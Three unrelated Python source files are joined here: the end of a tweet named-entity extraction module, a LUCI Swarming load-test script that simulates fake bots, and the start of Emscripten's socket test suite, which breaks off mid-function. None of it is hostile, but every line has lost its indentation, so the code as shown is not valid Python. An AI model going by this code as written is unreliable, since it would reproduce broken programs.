topic_indicator=True
ne_element.set_feature(ne.change_in_capitalization,val)
elif (match_lst2):
#print ("GOTIT2: "+phrase)
p3=re.compile(r'([A-Z]{1}[a-z]+)+')
val=list(p3.finditer(phrase))[-1].span()[1]
ne_element.set_feature(ne.change_in_capitalization,val)
else:
ne_element.set_feature(ne.change_in_capitalization,val)
ne_element.set_feature(ne.has_topic_indicator,topic_indicator)
return ne_element
def quoteProcess(self,unitQuoted, tweetWordList):
candidateString=""
retList=[]
matches=[]
quoteMatch=[]
final=[]
flag=False
#print(tweetWordList)
list1=list(map(lambda index: tweetWordList[index], unitQuoted))
candidateString=" ".join(list1)
#print("=>",candidateString)
# candidateString=""
# for index in range(len(unitQuoted)-1):
# candidateString+=tweetWordList[unitQuoted[index]]+" "
# candidateString+=tweetWordList[unitQuoted[-1]]
# print("=>",candidateString)
flagOne=False
flagTwo=False
flagThree=False
flagFour=False
p= re.compile(r'[^\S]*([\'].*?[\'])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\'].*?[\'])[^\s]*')
p2=re.compile(r'[^\s]*([\'].*?[\'])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagOne=True
if(not flagOne):
p= re.compile(r'[^\S]*([‘].*?[’])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([‘].*?[’])[^\s]*')
p2=re.compile(r'[^\s]*([‘].*?[’])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagTwo=True
if((not flagOne)&(not flagTwo)):
p= re.compile(r'[^\S]*([“].*?[”])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([“].*?[”])[^\s]*')
p2=re.compile(r'[^\s]*([“].*?[”])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagThree=True
if((not flagOne)&(not flagTwo)&(not flagThree)):
p= re.compile(r'[^\S]*([\"].*?[\"])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\"].*?[\"])[^\s]*')
p2=re.compile(r'[^\s]*([\"].*?[\"])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagFour=True
if (flagOne|flagTwo|flagThree|flagFour):
flag=True
for index in indices:
span= list(index.span())
#print(span[0])
quoteMatch.append([int(span[0]),int(span[1])])
matches+=[int(span[0]),int(span[1])]
#print(matches)
final+=[(candidateString[0:matches[0]],False)]
for i in range(len(matches)-1):
if([matches[i],matches[i+1]] in quoteMatch):
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),True)]
else:
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),False)]
final+=[(candidateString[matches[-1]:],False)]
final=list(filter(lambda strin: strin[0]!="",final))
final=list(map(lambda strin: (strin[0].strip(),strin[1]),final))
#print(final)
for unit in final:
lst=[]
unitsplit=list(filter(lambda unitString: unitString!='',unit[0].split()))
for splitunit in unitsplit:
lst+=[tweetWordList.index(splitunit,unitQuoted[0])]
retList+=[(lst,unit[1])]
else:
retList+=[(unitQuoted,False)]
#print(retList)
return retList
# In[318]:
def trueEntity_process(self,tweetWordList_cappos,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#returns list with position of consecutively capitalized words
#print(tweetWordList_cappos, tweetWordList)
output_unfiltered = self.consecutive_cap(tweetWordList_cappos,tweetWordList)
#print("==>",output_unfiltered)
#splitting at quoted units
output_quoteProcessed=[]
start_quote=[]
end_quote=[]
for unitQuoted in output_unfiltered:
unitout=self.quoteProcess(unitQuoted, tweetWordList)
#print("==>",unitout)
for elem in unitout:
mod_out=[]
out=elem[0]
flag=elem[1]
sflag=False
# '’”"
#print(out,flag)
if not (flag):
#for id in range(len(out)):
temp=[]
#print("::",out)
for index in out:
#print(index,tweetWordList[index])
word=(((tweetWordList[index].strip().strip('"“‘’”"')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print("=>"+word)"“‘’”"
if (word):
if (word in combined):
if(len(out)==1):
temp.append(index)
else:
if (word not in prep_list)&(word not in article_list):
temp.append(index)
else:
sflag=True
#else:
#if ((index==0)||()):
#temp.append(index)
# else:
# print("here")
# else:
# print("here")
#print(temp)
for elem in temp:
out.remove(elem)
#out[id]=temp
lst=[]
for k, g in groupby(enumerate(out), lambda elem: elem[1]-elem[0]):
lst=list(map(itemgetter(1), g))
#print("==>",lst)
if(lst):
mod_out.append((lst,sflag,flag))
#print('==>',mod_out)
else:
mod_out=[(out,sflag,flag)]
#print(mod_out)
#print(mod_out)
if(mod_out):
output_quoteProcessed.extend(mod_out)
#'cgl\print("=====>",output_quoteProcessed)
output= list(filter(lambda element: ((element[0]!=[0])&(element[0]!=[])), output_quoteProcessed))
#print(output)
#consecutive capitalized phrases
consecutive_cap_phrases1=list(map(lambda x: self.f(x[0],x[1],x[2],tweetWordList), output))
consecutive_cap_phrases=list(filter(lambda candidate:(candidate.phraseText!="JUST_DIGIT_ERROR"),consecutive_cap_phrases1))
#self.printList(consecutive_cap_phrases)
#implement the punctuation clause
ne_List_pc=self.flatten(list(map(lambda NE_phrase: self.punct_clause(NE_phrase), consecutive_cap_phrases)),[])
#self.printList(ne_List_pc)
#stopword removal and start-of-sentence
ne_List_pc_sr= list(map(lambda candidate: self.stopwordReplace(candidate), ne_List_pc))
#self.printList(ne_List_pc_sr)
ne_List_pc_checked= list(filter(lambda candidate: ((candidate.phraseText!="")&(candidate.position!=[0])), ne_List_pc_sr))
#implement title detection
#ne_List_titleCheck= list(map(lambda element: self.title_check(element), ne_List_pc_checked))
#implement slang check and remove
ne_List_slangCheck= list(filter(lambda element: not self.slang_remove(element), ne_List_pc_checked))
#implement apostrophe, tense and punctuation marker with final number check
#ne_List_apostropeCheck= list(map(lambda element: self.apostrope_check(element), ne_List_slangCheck))
#ne_List_punctuationCheck= list(map(lambda element: self.punctuation_check(element), ne_List_apostropeCheck))
ne_List_numCheck=list(filter(lambda candidate: not (candidate.phraseText.lstrip(string.punctuation).rstrip(string.punctuation).strip()).isdigit(), ne_List_slangCheck))
#ne_List_tenseCheck= list(map(lambda element: self.tense_check(element), ne_List_numCheck))
#tracking sudden change in capitalization pattern
#ne_List_capPatCheck= list(map(lambda element: self.capitalization_change(element), ne_List_tenseCheck))
#check on length
ne_List_lengthCheck= list(filter(lambda element: element.length<7, ne_List_numCheck))
ne_List_badWordCheck= list(filter(lambda element:((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”').lower()) not in combined, ne_List_lengthCheck))
ne_List_allCheck= list(filter(lambda element:(len((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”'))>1),ne_List_badWordCheck))
#ne_List_allCheck= list(filter(lambda element: (element.phraseText.lower() not in combined), ne_List_double_Check))
#q.put(ne_List_allCheck)
return ne_List_allCheck
#return ne_List_allCheck
# In[319]:
'''This is the main module. I am not explicitly writing it as a function as I am not sure what argument you are
passing.However you can call this whole cell as a function and it will call the rest of the functions in my module
to extract candidates and features
'''
'''#reads input from the database file and converts to a dataframe. You can change this part accordingly and
#directly convert argument tuple to the dataframe'''
#Inputs: Collection.csv 500Sample.csv 3.2KSample.csv eric_trump.csv
#df_out.to_csv('TweetBase500.csv')
#--------------------------------------PHASE I---------------------------------------------------
# In[ ]:
#--------------------------------------PHASE II---------------------------------------------------
'''set1 = set(['Melania','Trump'])
set2 = set(['Donald','Trump'])
set3 = set(['Jared','Kushner'])
m1 = MinHash(num_perm=200)
m2 = MinHash(num_perm=200)
m3 = MinHash(num_perm=200)
for d in set1:
m1.update(d.encode('utf8'))
for d in set2:
m2.update(d.encode('utf8'))
for d in set3:
m3.update(d.encode('utf8'))
# Create LSH index
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
lsh.insert("m3", m3)
result = lsh.query(m1)
print("Approximate neighbours with Jaccard similarity", result)
candidates=["donald trump","melania trump", "obama","barack obama","barack"]
listofMinhash=[]
m=MinHash(num_perm=200)
candidate0=set(candidates[0].split())
for d in candidate0:
m.update(d.encode('utf8'))
listofMinhash.append(m)
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
for candidate in candidates[1:]:'''
# In[ ]:
'''
print ("Shingling articles...")
# The current shingle ID value to assign to the next new shingle we
# encounter. When a shingle gets added to the dictionary, we'll increment this
# value.
curShingleID = 0
# Create a dictionary of the articles, mapping the article identifier (e.g.,
# "t8470") to the list of shingle IDs that appear in the document.
candidatesAsShingleSets = {};
candidateNames = []
t0 = time.time()
totalShingles = 0
for k in range(0, len(sorted_NE_container.keys())):
# Read all of the words (they are all on one line) and split them by white space.
words = list(sorted_NE_container.keys())[k].split(" ")
# Retrieve the article ID, which is the first word on the line.
candidateID = k
# Maintain a list of all document IDs.
candidateNames.append(candidateID)
# 'shinglesInDoc' will hold all of the unique shingle IDs present in the current document.
#If a shingle ID occurs multiple times in the document,
# it will only appear once in the set (this is a property of Python sets).
shinglesInCandidate = set()
# For each word in the document...
for index in range(0, len(words)):
# Construct the shingle text by combining three words together.
shingle = words[index]
# Hash the shingle to a 32-bit integer.
#crc = binascii.crc32("")
crc = binascii.crc32(bytes(shingle, encoding="UTF-8")) & (0xffffffff)
# Add the hash value to the list of shingles for the current document.
# Note that set objects will only add the value to the set if the set
# doesn't already contain it.
shinglesInCandidate.add(crc)
# Store the completed list of shingles for this document in the dictionary.
#print(str(words)+": ")
#for i in shinglesInCandidate:
# print('0x%08x' %i)
candidatesAsShingleSets[candidateID] = shinglesInCandidate
# Count the number of shingles across all documents.
totalShingles = totalShingles + (len(words))
# Report how long shingling took.
print ('\nShingling ' + str(str(len(sorted_NE_container.keys()))) + ' candidates took %.2f sec.' % (time.time() - t0))
print ('\nAverage shingles per doc: %.2f' % (totalShingles / len(sorted_NE_container.keys())))
'''
# In[ ]:
'''
# =============================================================================
# Generate MinHash Signatures
# =============================================================================
numHashes=20
numCandidates=len(sorted_NE_container.keys())
# Time this step.
t0 = time.time()
print ('Generating random hash functions...')
# Record the maximum shingle ID that we assigned.
maxShingleID = 2**32-1
nextPrime = 4294967311
# Our random hash function will take the form of:
# h(x) = (a*x + b) % c
# Where 'x' is the input value, 'a' and 'b' are random coefficients, and 'c' is
# a prime number just greater than maxShingleID.
# Generate a list of 'k' random coefficients for the random hash functions,
# while ensuring that the same value does not appear multiple times in the
# list.
def pickRandomCoeffs(k):
# Create a list of 'k' random values.
randList = []
while k > 0:
# Get a random shingle ID.
randIndex = random.randint(0, maxShingleID)
# Ensure that each random number is unique.
while randIndex in randList:
randIndex = random.randint(0, maxShingleID)
# Add the random number to the list.
randList.append(randIndex)
k = k - 1
return randList
# For each of the 'numHashes' hash functions, generate a different coefficient 'a' and 'b'.
coeffA = pickRandomCoeffs(numHashes)
coeffB = pickRandomCoeffs(numHashes)
print ('\nGenerating MinHash signatures for all candidates...')
# List of documents represented as signature vectors
signatures =np.ndarray(shape=(20, numCandidates))
# Rather than generating a random permutation of all possible shingles,
# we'll just hash the IDs of the shingles that are *actually in the document*,
# then take the lowest resulting hash code value. This corresponds to the index
# of the first shingle that you would have encountered in the random order.
# For each document...
for candidateID in candidateNames:
# Get the shingle set for this document.
shingleIDSet = candidatesAsShingleSets[candidateID]
# The resulting minhash signature for this document.
signature = []
# For each of the random hash functions...
for i in range(0, numHashes):
# For each of the shingles actually in the document, calculate its hash code
# using hash function 'i'.
# Track the lowest hash ID seen. Initialize 'minHashCode' to be greater than
# the maximum possible value output by the hash.
minHashCode = nextPrime + 1
# For each shingle in the document...
for shingleID in shingleIDSet:
# Evaluate the hash function.
hashCode = (coeffA[i] * shingleID + coeffB[i]) % nextPrime
# Track the lowest hash code seen.
if hashCode < minHashCode:
minHashCode = hashCode
# Add the smallest hash code value as component number 'i' of the signature.
signature.append(minHashCode)
# Store the MinHash signature for this document.
#signatures.append(signature)
signatures[:,candidateID]=signature
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print(list(np.shape(signatures)))
print ("\nGenerating MinHash signatures took %.2fsec" % elapsed)
#print ('\nsignatures stored in a numpy array...')
# Creates a N x N matrix initialized to 0.
# Time this step.
t0 = time.time()
# For each of the test documents...
for i in range(10, 11):
#for i in range(0, numCandidates):
print(list(sorted_NE_container.keys())[i]+": ",end="")
# Get the MinHash signature for document i.
signature1 = signatures[i]
# For each of the other test documents...
for j in range(0, numCandidates):
if(j!=i):
# Get the MinHash signature for document j.
signature2 = signatures[j]
count = 0
# Count the number of positions in the minhash signature which are equal.
for k in range(0, numHashes):
count = count + (signature1[k] == signature2[k])
# Record the percentage of positions which matched.
estJSim= (count / numHashes)
#print(estJSim)
if (estJSim>=0.5):
print("=>"+list(sorted_NE_container.keys())[j]+", ",end="")
print()
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print ("\nComparing MinHash signatures took %.2fsec" % elapsed)'''
# In[ ]:
'''cap_phrases="Trump:Russia,Afgha"
words=re.split('[,:]', cap_phrases)
print(words)
candidateString='"BS'
p= re.compile(r'(".*?")[^\s]*[\s]*')
indices= (list( p.finditer(candidateString) ))
matches=[]
final=[]
if(indices):
for index in indices:
span= list(index.span())
#print(span[0])
matches+=[int(span[0]),int(span[1])]
print(matches)
final+=[candidateString[0:matches[0]]]
for i in range(len(matches)-1):
final+=[(candidateString[matches[i]:matches[i+1]]).strip()]
final+=[candidateString[matches[-1]:]]
final=list(filter(lambda strin: strin!="",final))
final=list(map(lambda strin: strin.strip(),final))
print(final)'''
# tweets=pd.read_csv("deduplicated_test.csv", header=0, index_col = 0 ,encoding = 'utf-8',delimiter=';')
# tweets=tweets[:1000:]
# Phase1= SatadishaModule()
# for i in range(2):
# Phase1= SatadishaModule()
# Phase1.extract(tweets,1)
|
swarming_load_test_bot.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Triggers a ton of fake jobs to test its handling under high load.
Generates an histogram with the latencies to process the tasks and number of
retries.
"""
import hashlib
import json
import logging
import optparse
import os
import Queue
import socket
import StringIO
import sys
import threading
import time
import zipfile
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(
__file__.decode(sys.getfilesystemencoding()))))
sys.path.insert(0, ROOT_DIR)
from third_party import colorama
import swarming
from utils import graph
from utils import net
from utils import threading_utils
# Line too long (NN/80)
# pylint: disable=C0301
OS_NAME = 'Comodore64'
TASK_OUTPUT = 'This task ran with great success'
def print_results(results, columns, buckets):
delays = [i for i in results if isinstance(i, float)]
failures = [i for i in results if not isinstance(i, float)]
print('%sDELAYS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
graph.print_histogram(
graph.generate_histogram(delays, buckets), columns, ' %.3f')
print('')
print('Total items : %d' % len(results))
average = 0
if delays:
average = sum(delays)/ len(delays)
print('Average delay: %s' % graph.to_units(average))
print('')
if failures:
print('%sEVENTS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
values = {}
for f in failures:
values.setdefault(f, 0)
values[f] += 1
graph.print_histogram(values, columns, ' %s')
print('')
def generate_version(source):
"""Generates the sha-1 based on the content of this zip.
Copied from ../utils/zip_package.py.
"""
h = hashlib.sha1()
with zipfile.ZipFile(source, 'r') as z:
for name in sorted(z.namelist()):
with z.open(name) as f:
h.update(str(len(name)))
h.update(name)
content = f.read()
h.update(str(len(content)))
h.update(content)
return h.hexdigest()
def calculate_version(url):
"""Retrieves the swarm_bot code and returns the SHA-1 for it."""
# Cannot use url_open() since zipfile requires .seek().
return generate_version(StringIO.StringIO(net.url_read(url)))
def get_hostname():
return socket.getfqdn().lower().split('.', 1)[0]
class FakeSwarmBot(object):
"""This is a Fake swarm_bot implementation simulating it is running
Comodore64.
It polls for job, acts as if it was processing them and return the fake
result.
"""
def __init__(
self, swarming_url, dimensions, swarm_bot_version_hash, hostname, index,
progress, duration, events, kill_event):
self._lock = threading.Lock()
self._swarming = swarming_url
self._index = index
self._progress = progress
self._duration = duration
self._events = events
self._kill_event = kill_event
self._bot_id = '%s-%d' % (hostname, index)
self._attributes = {
'dimensions': dimensions,
'id': self._bot_id,
# TODO(maruel): Use os_utilities.py.
'ip': '127.0.0.1',
'try_count': 0,
'version': swarm_bot_version_hash,
}
self._thread = threading.Thread(target=self._run, name='bot%d' % index)
self._thread.daemon = True
self._thread.start()
def join(self):
self._thread.join()
def is_alive(self):
return self._thread.is_alive()
def _run(self):
"""Polls the server and fake execution."""
try:
self._progress.update_item('%d alive' % self._index, bots=1)
while True:
if self._kill_event.is_set():
return
data = {'attributes': json.dumps(self._attributes)}
request = net.url_read(self._swarming + '/poll_for_test', data=data)
if request is None:
self._events.put('poll_for_test_empty')
continue
start = time.time()
try:
manifest = json.loads(request)
except ValueError:
self._progress.update_item('Failed to poll')
self._events.put('poll_for_test_invalid')
continue
commands = [c['function'] for c in manifest.get('commands', [])]
if not commands:
# Nothing to run.
self._events.put('sleep')
time.sleep(manifest['come_back'])
continue
if commands == ['UpdateSlave']:
# Calculate the proper SHA-1 and loop again.
# This could happen if the Swarming server is upgraded while this
# script runs.
self._attributes['version'] = calculate_version(
manifest['commands'][0]['args'])
self._events.put('update_slave')
continue
if commands != ['RunManifest']:
self._progress.update_item(
'Unexpected RPC call %s\n%s' % (commands, manifest))
self._events.put('unknown_rpc')
break
store_cmd = manifest['commands'][0]
if not isinstance(store_cmd['args'], unicode):
self._progress.update_item('Unexpected RPC manifest\n%s' % manifest)
self._events.put('unknown_args')
break
result_url = manifest['result_url']
test_run = json.loads(store_cmd['args'])
if result_url != test_run['result_url']:
self._progress.update_item(
'Unexpected result url: %s != %s' %
(result_url, test_run['result_url']))
self._events.put('invalid_result_url')
break
ping_url = test_run['ping_url']
ping_delay = test_run['ping_delay']
self._progress.update_item('%d processing' % self._index, processing=1)
# Fake activity and send pings as requested.
while True:
remaining = max(0, (start + self._duration) - time.time())
if remaining > ping_delay:
# Include empty data to ensure the request is a POST request.
result = net.url_read(ping_url, data={})
assert result == 'Success.', result
remaining = max(0, (start + self._duration) - time.time())
if not remaining:
break
time.sleep(remaining)
# In the old API, r=<task_id>&id=<bot_id> is passed as the url.
data = {
'o': TASK_OUTPUT,
'x': '0',
}
result = net.url_read(manifest['result_url'], data=data)
self._progress.update_item(
'%d processed' % self._index, processing=-1, processed=1)
if not result:
self._events.put('result_url_fail')
else:
assert result == 'Successfully update the runner results.', result
self._events.put(time.time() - start)
finally:
try:
# Unregister itself. Otherwise the server will have tons of fake bots
# that the admin will have to remove manually.
response = net.url_read(
self._swarming + '/delete_machine_stats',
data=[('r', self._bot_id)])
if response is None:
self._events.put('failed_unregister')
finally:
self._progress.update_item('%d quit' % self._index, bots=-1)
def main():
colorama.init()
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option(
'-S', '--swarming',
metavar='URL', default='',
help='Swarming server to use')
parser.add_option(
'--suffix', metavar='NAME', default='', help='Bot suffix name to use')
swarming.add_filter_options(parser)
# Use improbable values to reduce the chance of interfering with real bots.
parser.set_defaults(
dimensions=[
('cpu', ['arm36']),
('hostname', socket.getfqdn()),
('os', OS_NAME),
])
group = optparse.OptionGroup(parser, 'Load generated')
group.add_option(
'--bots', type='int', default=300, metavar='N',
help='Number of swarming bots, default: %default')
group.add_option(
'-c', '--consume', type='float', default=60., metavar='N',
help='Duration (s) for consuming a request, default: %default')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Display options')
group.add_option(
'--columns', type='int', default=graph.get_console_width(), metavar='N',
help='For histogram display, default:%default')
group.add_option(
'--buckets', type='int', default=20, metavar='N',
help='Number of buckets for histogram display, default:%default')
parser.add_option_group(group)
parser.add_option(
'--dump', metavar='FOO.JSON', help='Dumps to json file')
parser.add_option(
'-v', '--verbose', action='store_true', help='Enables logging')
options, args = parser.parse_args()
logging.basicConfig(level=logging.INFO if options.verbose else logging.FATAL)
if args:
parser.error('Unsupported args: %s' % args)
options.swarming = options.swarming.rstrip('/')
if not options.swarming:
parser.error('--swarming is required.')
if options.consume <= 0:
parser.error('Needs --consume > 0. 0.01 is a valid value.')
swarming.process_filter_options(parser, options)
print(
'Running %d bots, each task lasting %.1fs' % (
options.bots, options.consume))
print('Ctrl-C to exit.')
print('[processing/processed/bots]')
columns = [('processing', 0), ('processed', 0), ('bots', 0)]
progress = threading_utils.Progress(columns)
events = Queue.Queue()
start = time.time()
kill_event = threading.Event()
swarm_bot_version_hash = calculate_version(options.swarming + '/bot_code')
hostname = get_hostname()
if options.suffix:
hostname += '-' + options.suffix
bots = [
FakeSwarmBot(
options.swarming, options.dimensions, swarm_bot_version_hash, hostname, i,
progress, options.consume, events, kill_event)
for i in range(options.bots)
]
try:
# Wait for all the bots to come alive.
while not all(s.is_alive() for s in bots):
time.sleep(0.01)
progress.update_item('Ready to run')
while bots:
progress.print_update()
time.sleep(0.01)
# The bots could be told to die.
bots = [s for s in bots if s.is_alive()]
except KeyboardInterrupt:
kill_event.set()
progress.update_item('Waiting for bots to quit.', raw=True)
progress.update_item('')
while bots:
progress.print_update()
bots = [s for s in bots if s.is_alive()]
# At this point, progress is not used anymore.
print('')
print('Ran for %.1fs.' % (time.time() - start))
print('')
results = list(events.queue)
print_results(results, options.columns, options.buckets)
if options.dump:
with open(options.dump, 'w') as f:
json.dump(results, f, separators=(',',':'))
return 0
if __name__ == '__main__':
sys.exit(main())
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen, PIPE
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from common import BrowserCore, no_windows, create_file, test_file, read_file
from tools import shared, config, utils
from tools.shared import PYTHON, EMCC, path_from_root, WINDOWS, run_process, CLANG_CC
npm_checked = False
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout, '/ err:', proc.stderr)
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket/nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket/tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + test_file('sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(test_file('sockets/test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
sockets_include = '-I' + test_file('sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(test_file('sockets/test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(test_file('sockets/test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
